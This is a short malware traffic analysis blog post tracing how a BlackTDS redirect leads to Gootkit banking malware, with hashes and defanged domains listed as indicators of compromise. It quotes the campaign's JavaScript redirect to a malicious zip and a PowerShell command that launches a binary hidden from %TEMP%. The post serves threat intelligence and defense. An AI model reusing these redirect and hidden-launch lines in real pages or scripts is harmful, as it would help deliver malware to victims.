Malware Traffic Internals: BlackTDS Leads to Gootkit Banking Malware Distribution

Malware Analysis
1


Goal: Review and document latest BlackTDS traffic distribution leading to Gootkit banking malware.

Background
While analyzing the BlackTDS traffic distribution, I noticed the BlackTDS iframe leading to the zip archive download that would ultimately download the Gootkit banking malware. Gootkit banking malware gang appears to have started utilizing the BlackTDS for banking malware distribution in addition to the steady stream of spam campaigns (from Mailchip to Mailgun spam abuses), meticulously tracked by @dvk01uk.
3-29-2018: #Malware Traffic Internals:#BlackTDS iframe -> #JavaScript facture[.]zip with JS (quickbooksa[.com/data/Facture_FA03704.zip)
-> PowerShell scr -> #Gootkit banking #malware (anythingpng[.com/data/facture_c04507.pdf)
Gootkit gang also started utilizing BlackTDS loads pic.twitter.com/LnjfygKv0s
— Vitali Kremez (@VK_Intel) March 29, 2018

Traffic chain
I. BlackTDS domain redirect:
<style> html, body { margin: 0; padding: 0; height : 100%; } </style>
<script type=“text/javascript”>
document.write(‘&lt;script type='text/javascript'&gt;location = 'hxxps://quickbooksa[.]com/data/Facture_FA03704.zip';&lt;/script&gt;’);
</script>
<iframe src=“” style=“display:block; width:100%; height:100%; border:none; margin:0; padding:0;”></iframe><span style=“visibility: hidden”><a href=“/insert”>[BLOB]</a><a href=“/register”>[BLOB]</a></span>
II. Download zip archive “Facture_FA03704.zip” containing a JavaScript loader
MD5 (Facture_FA03704.zip) = 71345b139166482acaa568ac8816c7bc
III. JavaScript loader “Facture_FA03704.js”:
MD5 (Facture_FA03704.js) = 1b60021baedc3f9201bcdb40e9b87f62
IV. Download Gootkit Binary “Facture_c04507.pdf”:
Domain: anythingpng[.]com/data/facture_c04507.pdf 
V. Binary launch through CMD/PowerShell loader in %TEMP%
MD5 (facture_c04507.pdf) = c7c8d584758854bbe0d8e64ef53ae1a8
cmd.exe /C PowerShell "Start-Sleep 280; try{Start-Process %TEMP%&lt;BINARY>.exe -WindowStyle Hidden} catch{ }
Mutex: “ServiceEntryPointThread”
Additional quick Gootkit anti-analysis:
3-14-2018: #Gootkit #malware anti-analysis tricks |
GetModuleHandle DLL checks | GetUserName |
GetComputerName | CreateMutex | Bios registry |
decoding XOR loops
Mutex: “ServiceEntryPointThread”
Thx: @dvk01uk
Binary: 0bfd40449c1de10ddaa4d9a85e01b32c pic.twitter.com/OI6CBSh1gl
— Vitali Kremez (@VK_Intel) March 14, 2018
Addendum: Indicators of Compromise (IOCs):
Domain:
  • hxxps://quickbooksa[.]com/data/Facture_FA03704[.]zip
  • anythingpng[.]com/data/facture_c04507[.]pdf 
Zip archive “Facture_FA03704.zip”:
  • MD5: 71345b139166482acaa568ac8816c7bc
JavaScript Loader “Facture_FA03704.js”:
  • MD5: 1b60021baedc3f9201bcdb40e9b87f62
Gootkit Binary “Facture_c04507.pdf”:
  • MD5: c7c8d584758854bbe0d8e64ef53ae1a8

Article Link: http://www.vkremez.com/2018/03/3-29-2018-malware-traffic-internals.html